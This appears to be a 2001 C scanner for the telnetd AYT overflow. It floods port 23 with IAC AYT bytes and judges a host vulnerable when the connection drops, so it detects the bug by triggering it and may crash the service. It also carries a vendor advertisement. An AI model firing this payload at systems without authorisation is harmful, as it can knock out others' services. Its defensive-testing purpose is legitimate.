/*
 * Telnetd AYT overflow scanner, by Security Point(R)
 *              Bug found by scut of TESO Security
 *
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW: http://www.secpoint.com
 * Email: info@secpoint.com
 * 
 * This program checks for the AYT overflow realted to the
 * newly discovered telnetd vulnerabilities.
 *
 * Tested agianst:
 *	Vulnerable:
 *		netkit-telnet-0.10
 *              FreeBSD 4.2
 *	Not vulnerable:
 *		netkit-telnet-0.17
 *
 * Please keep us updated whith the os's that you check, and
 * report back to us on info@secpoint.com, weather the system 
 * is vulnerable or not. So we can construct a full list 
 * of vulnerable systems.
 *
 *
 * This source code is for educational purpose ONLY, 
 * Security Point(R) will not be responsible for any damages 
 * whatsoever that have a connection with this code. There are 
 * no warranties with regard to this information.
 *
 * Are your networks under attack at this moment?
 *
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 *
 * Please see http://www.secpoint.com/solutions.php
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>


struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

void handle_alarm(int signum) {
    alarm(0);
    timeout=1;
}

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
	printf("Usage: %s <host>\n", argv[0]);
	exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
	perror("gethostbyname");
	exit(0);
	exit(EXIT_FAILURE);
    }
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
	perror("socket");
	exit(EXIT_FAILURE);
    }
    bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
    address.sin_family=AF_INET;
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
	perror("connect");
	exit(EXIT_FAILURE);
    }
    printf("Connected to remote host...\n",argv[1]);
    printf("Sending telnet options... stand by...\n");
    signal(SIGALRM,handle_alarm);

    bzero(sendbuffer,sizeof(sendbuffer));
    for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
	sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT
    }
    alarm(60);
    read(sock, buffer, sizeof(buffer));
    alarm(0);

    write(sock, sendbuffer, strlen(sendbuffer));
    
    bzero(buffer,sizeof(buffer));

    alarm(60);
    if (read(sock, buffer, sizeof(buffer)) <=0) {
	printf("Telnetd on %s vulnerable\n",argv[1]);
	exit(EXIT_SUCCESS);
    }
    alarm(0);
    printf("Telnetd on %s not vulnerable\n",argv[1]);
    exit(EXIT_SUCCESS);
}